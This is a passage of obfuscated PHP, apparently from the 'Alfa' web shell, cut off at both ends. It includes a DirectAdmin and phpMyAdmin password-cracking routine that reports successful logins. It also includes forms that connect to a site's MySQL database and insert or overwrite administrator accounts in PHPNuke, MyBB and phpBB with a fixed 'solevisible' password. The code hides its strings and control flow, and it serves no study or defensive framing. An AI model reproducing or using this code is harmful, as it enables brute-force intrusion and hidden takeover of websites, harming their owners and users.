"\x76\x62" => "\166\102\165\154\x6c\145\x74\x69\156", "\167\x68\x6d\143\163" => "\x57\150\155\143\163", "\152\x6f\157\x6d\x6c\x61" => "\112\x6f\x6f\x6d\x6c\141", "\160\150\x70\x6e\165\153\145" => "\120\x48\x50\x4e\165\153\145", "\160\150\x70\142\x62" => "\x50\110\x50\102\x42", "\155\171\142\142" => "\115\x79\102\102", "\x64\x72\x75\x70\141\x6c" => "\104\162\165\160\141\x6c", "\x73\155\146" => "\123\x4d\x46"); goto CtITF; IDB02: } goto i0AIl; eTrml: @set_time_limit(0); goto dsCAl; gWi5O: function Alfa_DirectAdmin_Cracker($info) { goto Q4yQ3; sv6Zt: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); goto ZG8BK; AtZzZ: $curl_errno = curl_errno($curl); goto AjYVa; Q4yQ3: if (!$info["\155\x79\x73\x71\x6c"]) { $url = $info["\x70\x72\x6f\x74\157\143\x6f\x6c"] . $info["\164\x61\x72\147\x65\164"] . "\x3a" . $info["\160\157\162\x74"] . "\57\x43\x4d\104\x5f\x4c\117\107\111\116"; } else { $url = $info["\x70\x72\x6f\x74\x6f\x63\x6f\154"] . $info["\164\141\162\147\145\164"] . "\57\x70\x68\160\155\171\141\x64\155\x69\x6e"; } goto mYM2Y; bInua: curl_setopt($curl, CURLOPT_USERPWD, $info["\165\163\145\x72\156\141\x6d\145"] . "\x3a" . $info["\160\x61\163\x73\x77\x6f\x72\144"]); goto JPA7c; ioLUP: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); goto PhNL_; tSQRb: if ($curl_errno > 0) { echo "\x3c\x66\157\x6e\164\40\143\157\154\157\x72\75\47\x72\145\144\47\x3e\105\x72\162\157\x72\x3a\40{$curl_error}\74\57\146\157\156\164\76\74\x62\162\x3e"; } elseif (preg_match("\x2f\x43\115\104\x5f\106\x49\x4c\x45\137\x4d\101\116\x41\107\x45\x52\174\146\x72\141\155\145\x73\145\x74\x2f\151", $result)) { goto V3b8V; V3b8V: echo "\x55\x73\145\162\x4e\x61\155\x65\x3a\40\74\146\157\156\164\40\143\157\154\157\x72\75\42\162\145\x64\42\76" . $info["\165\x73\145\x72\156\x61\155\145"] . "\74\x2f\x66\x6f\x6e\164\x3e\40\120\x61\163\x73\x57\x6f\162\x64\72\40\x3c\146\x6f\x6e\164\40\x63\157\154\157\x72\75\42\162\x65\144\x22\x3e" . $info["\160\x61\x73\163\167\x6f\162\x64"] . "\74\x2f\x66\157\156\164\76\74\x66\x6f\x6e\x74\40\x63\157\154\x6f\162\75\42\x67\x72\x65\x65\x6e\42\76\40\x20\114\x6f\147\151\x6e\x20\123\165\x63\143\x65\163\163\56\56\56\56\74\x2f\x66\x6f\156\x74\x3e\74\142\x72\x3e"; goto gVk2V; EYEJL: CrackerResualt($info); goto EEykt; gVk2V: $info["\164\141\162\147\145\x74"] = $url; goto EYEJL; EEykt: } goto Ja9nx; lTDfW: curl_setopt($curl, CURLOPT_URL, $url); goto bInua; mYM2Y: $curl = curl_init(); goto ioLUP; JgYHy: curl_setopt($curl, CURLOPT_HEADER, 0); goto Us3wJ; W1CAF: $result = curl_exec($curl); goto AtZzZ; PhNL_: curl_setopt($curl, CURLOPT_USERAGENT, "\115\x6f\172\x69\154\x6c\x61\57\65\x2e\60\40\50\127\151\156\144\157\167\x73\x20\116\124\40\66\x2e\62\x3b\40\127\117\127\66\64\73\40\162\x76\x3a\61\x37\x2e\x30\51\x20\107\x65\x63\x6b\157\57\62\x30\x31\x30\60\61\60\x31\x20\106\x69\162\145\x66\157\170\57\x31\x37\56\x30"); goto sv6Zt; ZG8BK: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); goto JgYHy; Us3wJ: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto lTDfW; AjYVa: $curl_error = curl_error($curl); goto tSQRb; Ja9nx: curl_close($curl); goto H9J7T; JPA7c: if ($info["\x6d\x79\x73\x71\x6c"]) { curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY); } goto W1CAF; H9J7T: } goto zhsok; ZOZAR: function decrypt_post($str, $pwd) { if (__ALFA_POST_ENCRYPTION__) { goto U4SkN; vctiI: $enc_chr = ''; goto PrrKA; vjpIJ: return __ZGVjb2Rlcg($enc_str); goto mi1m0; U4SkN: $pwd = __ZW5jb2Rlcg($pwd); goto KvGXj; J7aiZ: $i = 0; goto CEjS6; CEjS6: while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } goto vjpIJ; PrrKA: $enc_str = ''; goto J7aiZ; KvGXj: $str = __ZGVjb2Rlcg($str); goto vctiI; mi1m0: } else { return __ZGVjb2Rlcg($str); } } goto uneHH; uM4l3: function alfapwchanger() { goto wDmLQ; O1wfL: if (isset($_POST["\141\154\146\x61\70"]) && $_POST["\x61\154\146\141\x38"] == "\156\165\x6b\x65") { goto VfjgG; vDGhP: if ($_POST["\x61\x6c\146\141\x31"] && $_POST["\141\x6c\146\141\x31"] == "\x3e\76") { goto dD86b; k6hSn: $hash = md5($pwd); goto j6Qjv; Cvstz: $admin = $_POST["\x61\154\x66\x61\67"]; goto h3enN; W0sKU: $prefix = $_POST["\x61\154\146\141\x31\60"]; goto NqCJD; NqCJD: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto k6hSn; MIuon: if ($solevisible) { __alert("\x53\x75\x63\143\x65\x73\163\56\x2e\x2e\x20" . $admin . "\40\151\x73\40\143\162\145\141\164\145\x64\x2e\x2e\56"); } goto ZJF3H; GRSC4: $database = $_POST["\141\x6c\x66\x61\63"]; goto cCsd0; dD86b: $localhost = $_POST["\141\x6c\x66\x61\62"]; goto GRSC4; h3enN: $SQL = $_POST["\x61\154\146\141\71"]; goto W0sKU; tHf1v: $password = $_POST["\141\x6c\146\141\x35"]; goto Cvstz; cCsd0: $username = $_POST["\141\154\x66\x61\64"]; goto tHf1v; j6Qjv: $solevisible = @mysqli_query($conn, "\151\x6e\x73\145\x72\x74\40\151\x6e\164\157\40" . $prefix . "\x5f\141\165\x74\x68\157\162\163\50\141\151\x64\54\x6e\x61\155\145\54\x65\x6d\141\x69\x6c\54\x70\x77\x64\x29\x20\166\x61\x6c\x75\145\x73\50\x27{$admin}\47\54\47\107\x6f\x64\x27\54\x27{$SQL}\x27\x2c\47\x64\64\141\x35\x39\60\x63\x61\141\x63\x63\60\142\145\65\65\x65\146\62\x38\66\145\x34\60\x61\x39\64\x35\145\x61\64\x35\47\51") or die(mysqli_error($conn)); goto MIuon; ZJF3H: } goto QRtP9; EkbqQ: $table = array("\164\144\x31" => array("\143\x6f\154\x6f\x72" => "\106\106\x46\x46\106\x46", "\164\x64\x4e\141\155\x65" => "\x4d\x79\163\x71\154\x20\110\x6f\x73\164", "\151\144" => "\144\x62\x5f\150\157\163\164", "\151\156\x70\x75\164\x4e\141\x6d\x65" => "\154\157\143\141\x6c\x68\157\163\x74", "\151\x6e\160\x75\x74\126\x61\154\x75\145" => "\154\x6f\x63\x61\154\x68\157\x73\x74", "\x69\x6e\160\x75\164\x53\x69\172\x65" => "\65\60"), "\164\x64\62" => array("\x63\157\x6c\x6f\x72" => "\106\x46\106\x46\x46\106", "\164\144\116\x61\x6d\x65" => "\104\142\40\x4e\x61\155\145", "\151\x64" => "\x64\x62\137\x6e\x61\155\145", "\151\156\x70\x75\164\x4e\x61\155\145" => "\x64\x61\x74\141\x62\141\x73\145", "\151\x6e\160\165\164\126\x61\x6c\x75\x65" => '', "\151\x6e\x70\165\x74\123\151\x7a\x65" => "\x35\x30"), "\x74\x64\63" => array("\143\x6f\x6c\x6f\162" => "\106\x46\106\x46\106\x46", "\164\144\116\141\155\x65" => "\x44\142\40\125\163\x65\x72", "\x69\144" => "\x64\142\137\x75\163\145\162", "\151\x6e\160\165\x74\x4e\x61\155\x65" => "\x75\163\145\x72\156\141\155\x65", "\151\156\160\165\164\126\141\154\x75\145" => '', "\x69\x6e\160\165\x74\x53\151\x7a\145" => "\x35\60"), "\164\144\x34" => array("\x63\x6f\154\x6f\x72" => "\106\106\x46\x46\x46\106", "\164\x64\x4e\x61\155\145" => "\104\142\40\120\141\163\163", "\151\144" => "\144\142\137\160\167", "\x69\x6e\160\x75\164\116\x61\155\x65" => "\160\141\163\163\x77\157\x72\144", "\x69\156\x70\x75\x74\126\141\154\165\145" => '', "\151\x6e\x70\165\164\x53\x69\172\x65" => "\x35\x30"), "\x74\144\x35" => array("\143\157\154\x6f\x72" => "\106\x46\x46\x46\x46\106", "\x74\x64\116\x61\155\x65" => "\x54\141\142\x6c\145\x20\120\x72\x65\146\x69\170", "\151\144" => "\x64\142\137\x70\x72\x65\146\151\x78", "\151\156\160\165\164\116\141\155\145" => "\x70\162\x65\x66\151\170", "\x69\x6e\x70\x75\x74\x56\x61\x6c\165\145" => '', "\151\156\x70\165\164\123\151\172\x65" => "\65\60"), "\164\x64\x36" => array("\143\x6f\154\x6f\162" => "\x46\x46\60\x30\x30\60", "\x74\144\116\x61\x6d\x65" => "\x41\x64\155\151\x6e\x20\125\x73\145\x72", "\x69\156\x70\165\164\x4e\141\x6d\145" => "\141\x64\x6d\151\156", "\x69\156\x70\165\164\126\x61\x6c\165\x65" => "\141\144\155\x69\x6e", "\151\156\x70\165\164\x53\151\172\145" => "\x35\60"), "\x74\144\x37" => array("\143\x6f\x6c\157\x72" => "\x46\106\x30\60\60\x30", "\164\x64\x4e\x61\155\145" => "\101\144\x6d\151\156\40\120\141\x73\x73", "\x69\x6e\160\165\164\x4e\x61\155\x65" => "\x74\x6f\146\164\157\x66", "\151\156\x70\x75\x74\126\141\154\165\145" => "\163\x6f\x6c\x65\x76\x69\x73\x69\x62\154\145", "\151\x6e\160\165\x74\x53\x69\172\x65" => "\65\60", "\144\151\x73\141\142\154\145\x64" => true), "\x74\144\x38" => array("\x63\157\154\157\162" => "\x46\106\x30\x30\x30\60", "\x74\x64\x4e\141\x6d\x65" => "\x41\x64\x6d\x69\x6e\x20\105\x6d\141\x69\x6c", "\x69\x6e\x70\165\164\x4e\141\x6d\145" => "\145\155\x61\151\154", "\x69\156\160\x75\164\x56\x61\x6c\x75\x65" => "\x73\x6f\154\x65\166\x69\163\x69\142\154\x65\x40\x66\x62\x69\x2e\147\157\x76", "\x69\156\x70\165\164\x53\x69\x7a\x65" => "\x35\60")); goto itE8C; VfjgG: echo __pre() . "\x3c\x63\145\x6e\x74\145\162\76\x3c\x64\151\x76\40\x63\154\x61\x73\x73\x3d\x22\164\170\x74\146\x6f\156\x74\137\150\145\x61\144\145\162\42\76\x7c\x20\120\150\160\116\165\153\145\x20\x7c\74\x2f\144\x69\166\76\74\x70\76\74\160\76" . getConfigHtml("\160\x68\x70\156\165\x6b\145") . "\74\57\x70\76\74\x66\157\x72\x6d\40\157\156\x73\165\x62\x6d\x69\164\x3d\42\147\x28\x27\x70\x77\x63\x68\141\156\147\145\x72\47\x2c\156\165\154\154\x2c\x27\76\76\x27\54\x74\150\x69\163\56\154\x6f\x63\141\154\150\x6f\x73\164\56\166\x61\x6c\x75\145\x2c\x74\x68\x69\x73\x2e\x64\x61\x74\x61\x62\141\x73\145\56\166\141\154\165\x65\54\164\x68\x69\163\56\x75\x73\x65\162\156\141\x6d\145\56\x76\141\154\165\x65\x2c\x74\150\x69\163\56\x70\141\163\163\167\x6f\x72\144\x2e\166\x61\154\165\145\x2c\x6e\x75\x6c\154\54\164\x68\151\x73\56\x61\144\155\151\x6e\x2e\166\x61\x6c\165\x65\x2c\x27\x6e\x75\x6b\145\x27\x2c\x74\150\151\x73\x2e\x65\x6d\141\x69\154\56\166\x61\x6c\x75\x65\x2c\x74\150\151\163\56\160\x72\x65\146\151\170\x2e\x76\x61\x6c\x75\x65\x29\73\40\x72\x65\164\x75\162\156\x20\x66\141\x6c\x73\x65\73\42\x20\155\x65\x74\x68\x6f\x64\75\x22\x50\x4f\123\x54\42\76"; goto EkbqQ; itE8C: create_table($table); goto Go_97; Go_97: echo "\74\160\x3e\x3c\x69\x6e\160\165\x74\x20\x76\x61\x6c\165\145\x3d\x22\x20\42\x20\x6e\x61\x6d\x65\x3d\42\163\145\x6e\x64\x22\x20\164\171\x70\145\x3d\42\x73\165\x62\155\151\x74\x22\76\x3c\57\160\x3e\x3c\57\x66\157\x72\155\x3e\74\x2f\x63\x65\x6e\x74\145\x72\x3e"; goto vDGhP; QRtP9: } goto YHDK_; GMWFM: if (isset($_POST["\x61\154\x66\141\x37"]) && $_POST["\141\154\x66\141\x37"] == "\x6d\171\142\142") { goto kHC1D; TQhjm: $table = array("\x74\144\61" => array("\143\x6f\x6c\157\x72" => "\x46\x46\x46\x46\106\x46", "\164\x64\x4e\x61\x6d\145" => "\x4d\x79\163\161\154\x20\x48\157\163\164", "\151\144" => "\x64\142\x5f\150\x6f\163\164", "\151\x6e\160\x75\164\116\141\x6d\145" => "\154\x6f\x63\141\x6c\150\x6f\x73\x74", "\x69\x6e\160\x75\164\x56\141\154\165\145" => "\x6c\x6f\x63\141\x6c\x68\x6f\x73\164", "\x69\156\160\165\164\x53\x69\x7a\x65" => "\x35\60"), "\164\x64\x32" => array("\x63\157\x6c\157\162" => "\x46\x46\106\x46\x46\106", "\x74\144\116\x61\155\x65" => "\x44\142\x20\116\x61\x6d\145", "\151\144" => "\144\142\x5f\156\x61\155\145", "\x69\156\x70\165\164\x4e\141\155\x65" => "\x64\x61\164\141\x62\x61\163\145", "\x69\x6e\x70\165\x74\126\141\x6c\165\x65" => '', "\x69\156\160\165\164\x53\151\x7a\145" => "\x35\60"), "\164\144\x33" => array("\143\x6f\x6c\157\x72" => "\106\106\x46\x46\x46\106", "\164\x64\116\x61\155\x65" => "\104\x62\x20\x55\163\145\162", "\151\x64" => "\144\x62\137\x75\163\x65\x72", "\151\x6e\x70\x75\x74\x4e\141\155\145" => "\165\163\145\162\156\141\155\145", "\x69\156\160\165\164\126\141\154\x75\145" => '', "\x69\x6e\160\165\x74\x53\151\x7a\145" => "\65\x30"), "\x74\144\64" => array("\143\x6f\154\x6f\x72" => "\106\x46\x46\106\106\106", "\164\x64\x4e\x61\x6d\145" => "\104\142\40\120\141\163\x73", "\x69\x64" => "\144\x62\137\160\x77", "\151\156\x70\x75\x74\116\141\155\145" => "\x70\141\163\163\167\157\x72\144", "\x69\156\x70\x75\x74\126\141\x6c\165\x65" => '', "\151\156\x70\x75\164\x53\151\x7a\145" => "\x35\60"), "\164\144\x35" => array("\x63\157\154\157\x72" => "\106\106\x46\106\x46\x46", "\x74\x64\116\141\155\x65" => "\x54\x61\x62\x6c\x65\x20\x50\162\x65\146\x69\170", "\151\144" => "\144\142\137\160\x72\x65\x66\x69\x78", "\x69\x6e\160\165\164\x4e\141\x6d\145" => "\x70\x72\145\x66\x69\170", "\151\x6e\x70\x75\164\x56\141\154\165\x65" => '', "\x69\x6e\x70\165\164\123\151\172\145" => "\65\60"), "\x74\144\x36" => array("\143\x6f\x6c\x6f\x72" => "\x46\x46\60\x30\60\60", "\164\144\116\x61\x6d\145" => "\x41\144\155\151\x6e\x20\125\163\x65\162", "\x69\156\x70\x75\x74\x4e\141\155\145" => "\x61\144\155\x69\156", "\x69\x6e\x70\x75\164\x56\x61\x6c\x75\145" => "\141\x64\x6d\151\x6e", "\151\x6e\x70\165\x74\x53\x69\172\145" => "\65\x30"), "\164\144\67" => array("\143\x6f\154\157\x72" => "\106\x46\x30\60\60\x30", "\164\144\x4e\141\x6d\x65" => "\101\144\155\151\x6e\x20\120\141\163\x73", "\151\x6e\x70\x75\164\116\141\x6d\x65" => "\x74\157\x66\x74\x6f\x66", "\x69\x6e\160\x75\x74\126\141\x6c\x75\x65" => "\x73\x6f\154\x65\166\151\x73\x69\x62\154\x65", "\x69\156\x70\x75\x74\x53\x69\172\x65" => "\x35\x30", "\144\x69\x73\141\142\154\145\x64" => true), "\164\x64\x38" => array("\143\x6f\154\157\x72" => "\x46\x46\60\x30\x30\x30", "\x74\x64\116\x61\155\x65" => "\101\x64\155\151\x6e\x20\105\x6d\x61\151\x6c", "\x69\x6e\x70\165\164\x4e\x61\155\x65" => "\145\155\x61\151\x6c", "\x69\x6e\160\x75\x74\x56\x61\x6c\x75\145" => "\x73\157\154\145\x76\151\x73\x69\142\154\x65\x40\x66\142\x69\x2e\147\x6f\166", "\151\x6e\160\x75\164\123\x69\172\x65" => "\65\60")); goto rtCgh; ppOTT: if ($_POST["\141\154\146\x61\x31"] && $_POST["\x61\x6c\146\141\x31"] == "\76\76") { goto vXghn; HJiJJ: $prefix = $_POST["\141\x6c\146\x61\61\x30"]; goto O26xR; PMS4r: $solevisible = @mysqli_query($conn, "\x69\x6e\163\145\162\x74\40\x69\x6e\164\157\40" . $prefix . "\x75\163\145\x72\163\x20\x28\165\151\x64\x2c\165\x73\145\162\156\x61\155\x65\x2c\160\x61\163\163\x77\157\x72\144\x2c\163\141\154\x74\x2c\x65\155\141\151\154\54\x75\163\x65\x72\x67\162\157\165\160\x29\x20\166\x61\154\165\145\x73\50\x6e\x75\154\154\x2c\x27" . $admin . "\47\x2c\47\x65\67\x31\146\62\143\63\x32\x36\65\x36\61\71\x30\63\x38\144\70\x32\x36\x61\x31\x61\x63\x36\x65\62\142\x39\142\x38\145\x27\x2c\47\x79\167\x7a\x61\x36\70\x6c\x53\x27\54\47" . $SQL . "\47\54\47\64\x27\x29") or die(mysqli_error($conn)); goto ve7OG; vXghn: $localhost = $_POST["\141\x6c\x66\x61\62"]; goto LR8MU; YPA5m: $SQL = $_POST["\x61\x6c\146\x61\71"]; goto HJiJJ; O26xR: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto PMS4r; VkIwI: $admin = $_POST["\x61\154\x66\x61\70"]; goto YPA5m; cBw7A: $password = $_POST["\x61\x6c\146\x61\65"]; goto VkIwI; DA0pk: $username = $_POST["\x61\x6c\x66\141\x34"]; goto cBw7A; LR8MU: $database = $_POST["\x61\154\x66\x61\x33"]; goto DA0pk; ve7OG: if ($solevisible) { __alert("\x53\x75\x63\143\145\163\163\56\56\56\40" . $admin . "\40\x69\163\x20\143\x72\145\141\x74\145\x64\56\56\x2e"); } goto AaAan; AaAan: } goto mBGf2; kHC1D: echo __pre() . "\x3c\143\145\x6e\164\x65\162\x3e\x3c\x64\151\166\40\x63\154\141\163\x73\x3d\42\164\170\x74\146\x6f\x6e\164\x5f\x68\x65\141\x64\145\x72\42\x3e\x7c\40\115\x79\142\x62\40\174\74\x2f\x64\x69\x76\76\x3c\160\x3e\74\x70\x3e" . getConfigHtml("\155\171\x62\142") . "\x3c\57\x70\x3e\74\x66\x6f\x72\155\x20\x6f\156\x73\165\142\155\151\x74\x3d\x22\x67\50\47\x70\x77\x63\x68\141\x6e\147\145\x72\47\54\156\165\x6c\154\54\x27\76\x3e\x27\x2c\x74\x68\151\x73\x2e\x6c\x6f\143\141\154\x68\x6f\163\x74\x2e\166\141\x6c\165\x65\x2c\x74\x68\x69\163\56\x64\141\164\x61\142\141\163\145\56\x76\141\154\x75\145\54\x74\x68\x69\x73\x2e\x75\163\x65\162\156\x61\155\x65\56\x76\x61\x6c\x75\145\x2c\164\150\151\x73\56\160\x61\x73\x73\x77\157\162\x64\x2e\x76\141\x6c\x75\145\54\x6e\x75\x6c\154\54\47\x6d\x79\142\142\x27\54\x74\150\151\x73\x2e\x61\144\x6d\x69\x6e\56\x76\x61\154\x75\145\54\x74\150\x69\163\x2e\145\x6d\141\151\154\x2e\x76\141\x6c\165\145\x2c\164\x68\x69\x73\56\160\x72\145\146\151\x78\x2e\166\141\154\x75\145\x29\73\x20\x72\x65\x74\165\162\156\x20\x66\141\x6c\163\145\73\x22\40\x6d\x65\164\150\x6f\x64\x3d\x22\x50\x4f\x53\124\x22\x3e"; goto TQhjm; M7Rp4: echo "\74\x70\76\74\x69\x6e\x70\165\164\40\x76\x61\x6c\x75\x65\x3d\42\40\x22\40\x6e\x61\155\x65\75\42\x73\145\156\x64\x22\40\164\x79\x70\145\x3d\42\163\165\x62\155\151\164\42\76\74\x2f\160\76\74\x2f\146\x6f\x72\155\76\74\x2f\x63\145\156\164\145\x72\x3e"; goto ppOTT; rtCgh: create_table($table); goto M7Rp4; mBGf2: } goto O1wfL; AvKAd: if (isset($_POST["\x61\154\x66\141\65"]) && $_POST["\141\154\146\x61\65"] == "\160\150\x70\x62\142") { goto qv2pS; KiOPd: $table = array("\164\144\61" => array("\143\x6f\x6c\x6f\162" => "\x46\x46\106\x46\106\106", "\164\144\x4e\141\155\x65" => "\115\x79\x73\x71\154\40\110\157\163\x74", "\151\x64" => "\x64\142\137\150\157\163\x74", "\x69\156\160\165\x74\116\x61\155\x65" => "\154\157\143\141\x6c\x68\x6f\x73\164", "\151\156\160\165\x74\126\141\x6c\165\145" => "\x6c\x6f\x63\141\x6c\x68\x6f\x73\164", "\x69\156\160\x75\x74\123\151\x7a\145" => "\65\60"), "\164\x64\62" => array("\x63\157\154\x6f\x72" => "\106\106\106\106\106\106", "\x74\x64\x4e\x61\155\x65" => "\x44\142\x20\x4e\x61\155\x65", "\x69\144" => "\x64\x62\137\x6e\x61\155\145", "\151\x6e\x70\165\x74\x4e\141\x6d\145" => "\144\141\x74\141\142\141\163\x65", "\151\156\160\165\x74\x56\x61\154\x75\145" => '', "\x69\156\x70\165\x74\123\x69\x7a\x65" => "\x35\x30"), "\x74\x64\63" => array("\x63\157\154\157\162" => "\106\x46\x46\106\x46\106", "\164\144\116\x61\155\x65" => "\104\x62\40\125\x73\145\x72", "\151\144" => "\x64\x62\137\165\163\x65\x72", "\x69\156\160\x75\x74\116\141\x6d\145" => "\165\163\145\162\x6e\x61\155\145", "\x69\156\x70\x75\164\126\141\154\165\145" => '', "\x69\x6e\160\x75\x74\123\151\172\145" => "\x35\x30"), "\164\x64\x34" => array("\x63\157\154\157\x72" => "\x46\x46\106\106\x46\x46", "\164\144\116\x61\155\x65" => "\x44\x62\40\x50\x61\163\x73", "\151\x64" => "\x64\142\137\160\x77", "\151\x6e\x70\165\x74\x4e\141\x6d\x65" => "\x70\x61\x73\x73\x77\157\162\x64", "\x69\x6e\x70\x75\x74\x56\141\154\165\x65" => '', "\151\x6e\160\x75\x74\123\151\x7a\145" => "\65\x30"), "\x74\144\65" => array("\143\x6f\154\x6f\x72" => "\x46\106\106\x46\106\x46", "\x74\144\116\141\x6d\145" => "\x54\141\142\154\145\40\120\162\x65\x66\151\170", "\151\x64" => "\144\x62\137\x70\x72\145\x66\151\x78", "\x69\156\160\165\164\x4e\x61\x6d\145" => "\x70\x72\145\146\151\170", "\x69\x6e\x70\165\164\x56\x61\154\165\x65" => '', "\151\x6e\x70\165\x74\123\x69\x7a\145" => "\65\x30"), "\x74\x64\x36" => array("\x63\x6f\x6c\x6f\162" => "\106\x46\x30\x30\60\x30", "\x74\144\116\141\155\145" => "\101\x64\x6d\x69\x6e\x20\x55\x73\x65\162", "\151\x6e\160\165\x74\116\141\155\x65" => "\x61\x64\x6d\151\156", "\x69\156\160\165\164\x56\141\154\x75\145" => "\x61\144\x6d\x69\x6e", "\151\x6e\160\165\164\123\x69\x7a\x65" => "\65\x30"), "\164\x64\x37" => array("\143\x6f\x6c\x6f\x72" => "\x46\106\x30\x30\x30\x30", "\x74\144\x4e\141\x6d\x65" => "\101\x64\x6d\x69\x6e\40\120\141\x73\163", "\151\156\x70\165\x74\x4e\x61\x6d\145" => "\164\157\x66\164\157\x66", "\151\156\160\x75\x74\x56\141\154\165\145" => "\163\x6f\x6c\x65\x76\151\x73\x69\x62\x6c\x65", "\151\156\x70\165\164\x53\151\x7a\x65" => "\x35\x30", "\144\x69\163\x61\x62\154\145\144" => true), "\x74\x64\x38" => array("\x63\x6f\x6c\157\x72" => "\106\x46\x30\x30\x30\60", "\164\x64\x4e\x61\x6d\x65" => "\101\x64\155\x69\x6e\40\x45\155\x61\151\x6c", "\151\156\x70\165\164\116\141\x6d\145" => "\145\155\x61\x69\154", "\151\156\x70\x75\x74\x56\x61\x6c\x75\145" => "\163\157\154\145\166\x69\163\151\142\154\145\100\x66\x62\x69\56\147\157\166", "\x69\x6e\160\x75\x74\123\151\x7a\145" => "\65\x30")); goto zlKxU; HkrBD: echo "\74\160\x3e\x3c\x69\156\x70\x75\164\x20\166\x61\154\165\x65\75\42\40\42\x20\x6e\x61\x6d\145\x3d\x22\x73\145\x6e\144\x22\40\164\171\160\x65\x3d\42\163\x75\142\155\151\x74\x22\76\x3c\x2f\x70\x3e\x3c\57\146\x6f\x72\155\76\74\57\x63\x65\156\x74\x65\162\x3e"; goto lBMVY; lBMVY: if ($_POST["\141\154\x66\x61\x31"] && $_POST["\141\154\x66\141\61"] == "\x3e\76") { goto sMqr_; cJgUT: $database = $_POST["\x61\154\x66\141\63"]; goto I5Qmy; FLW7U: $solevisible = @mysqli_query($conn, "\125\x50\x44\x41\124\x45\x20" . $prefix . "\165\163\x65\x72\163\x20\123\x45\124\40\x75\163\x65\162\x6e\141\155\x65\137\143\x6c\145\141\x6e\40\x3d\x27" . $admin . "\x27\40\x57\x48\x45\122\105\40\x75\x73\x65\162\156\141\x6d\x65\x5f\x63\154\x65\x61\156\x20\75\x20\x27\141\x64\x6d\x69\156\47") or die(mysqli_error($conn)); goto Bwtbr; sIzTY: $hash = md5("\x73\x6f\x6c\x65\x76\151\x73\x69\x62\x6c\x65"); goto FLW7U; E0StN: $admin = $_POST["\x61\x6c\146\x61\x38"]; goto SIPP7; wibvW: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto sIzTY; gBEjP: $solevisible = @mysqli_query($conn, "\125\x50\104\101\x54\105\40" . $prefix . "\165\x73\x65\162\163\40\123\105\x54\x20\x75\x73\x65\162\156\141\x6d\145\x5f\x63\154\145\x61\x6e\40\x3d\x27" . $admin . "\x27\x20\127\110\x45\122\105\40\165\163\145\x72\137\164\171\x70\145\40\x3d\40\x33") or die(mysqli_error($conn)); goto vhD6b; vhD6b: $solevisible = @mysqli_query($conn, "\x55\x50\x44\x41\x54\105\40" . $prefix . "\165\x73\145\x72\x73\40\123\x45\124\x20\x75\163\145\x72\137\x70\141\163\x73\x77\x6f\162\144\40\75\47" . $hash . "\47\x20\127\110\x45\122\105\40\165\x73\145\x72\x5f\x74\171\x70\x65\x20\75\40\x33") or die(mysqli_error($conn)); goto lMhja; I5Qmy: $username = $_POST["\x61\154\146\x61\x34"]; goto xPRtR; Bwtbr: $solevisible = @mysqli_query($conn, "\x55\120\x44\x41\x54\105\40" . $prefix . "\x75\x73\x65\x72\x73\x20\123\105\124\40\165\163\x65\162\137\x70\141\163\163\x77\157\162\x64\x20\75\x27" . $hash . "\47\40\x57\x48\105\x52\x45\x20\x75\x73\145\162\x6e\x61\x6d\x65\137\143\x6c\x65\x61\x6e\x20\75\x20\x27\141\x64\x6d\151\156\47") or die(mysqli_error($conn)); goto gBEjP; ozIP8: $prefix = $_POST["\x61\154\146\141\x31\60"]; goto wibvW; Sj4d_: if ($solevisible) { __alert("\x53\165\143\143\x65\163\163\56\56\x2e\40" . $admin . "\40\151\x73\40\x63\x72\145\x61\164\x65\144\x2e\56\x2e"); } goto McivR; lMhja: $solevisible = @mysqli_query($conn, "\x55\x50\x44\101\124\105\40" . $prefix . "\165\163\x65\162\163\x20\123\x45\124\40\165\x73\x65\x72\137\145\155\141\151\x6c\40\x3d\47" . $SQL . "\47\x20\x57\110\105\122\x45\40\165\163\145\x72\x6e\141\155\145\x5f\143\x6c\x65\x61\x6e\x20\75\40\x27\x61\x64\155\x69\x6e\x27") or die(mysqli_error($conn)); goto Sj4d_; SIPP7: $SQL = $_POST["\141\154\146\x61\x39"]; goto ozIP8; xPRtR: $password = $_POST["\141\x6c\146\141\66"]; goto E0StN; sMqr_: $localhost = $_POST["\x61\154\x66\x61\x32"]; goto cJgUT; McivR: } goto m3zwH; zlKxU: create_table($table); goto HkrBD; qv2pS: echo __pre() . "\74\x63\145\156\164\x65\x72\x3e\74\x64\151\x76\x20\143\x6c\x61\x73\163\75\42\164\x78\x74\x66\157\156\164\137\150\x65\141\144\x65\162\42\x3e\x7c\40\160\150\160\x42\x42\x20\x7c\x3c\57\x64\151\166\76\74\x70\x3e\x3c\160\76" . getConfigHtml("\160\150\160\x62\x62") . "\74\57\160\76\x3c\x66\157\x72\155\40\x6f\x6e\123\x75\142\x6d\x69\164\x3d\42\147\50\x27\160\x77\x63\150\x61\x6e\147\x65\x72\47\x2c\x6e\165\x6c\x6c\54\x27\x3e\76\47\x2c\x74\x68\151\x73\56\154\x6f\x63\141\x6c\x68\157\x73\164\x2e\166\x61\x6c\x75\145\54\x74\150\x69\163\56\144\x61\164\x61\142\x61\x73\x65\56\166\141\x6c\x75\x65\x2c\x74\x68\151\x73\x2e\x75\163\145\162\156\141\155\x65\x2e\x76\x61\x6c\165\x65\54\47\x70\x68\x70\142\142\47\54\x74\150\x69\163\x2e\x70\141\x73\163\x77\x6f\162\144\x2e\166\x61\x6c\165\145\54\x6e\165\154\x6c\x2c\164\150\151\x73\56\141\x64\155\x69\x6e\56\166\x61\154\x75\145\x2c\164\x68\151\163\56\x65\x6d\x61\x69\x6c\56\x76\141\154\x75\145\54\164\150\151\x73\56\x70\x72\145\146\x69\170\56\x76\141\154\165\145\x29\x3b\40\x72\145\164\165\162\156\x20\146\x61\x6c\x73\x65\73\x22\40\x6d\145\164\150\x6f\144\x3d\x22\120\x4f\123\124\42\76"; goto KiOPd; m3zwH: } goto nHzbN; Bx2Ok: $vals = array("\x57\x6f\x72\144\x50\x72\145\163\x73" => 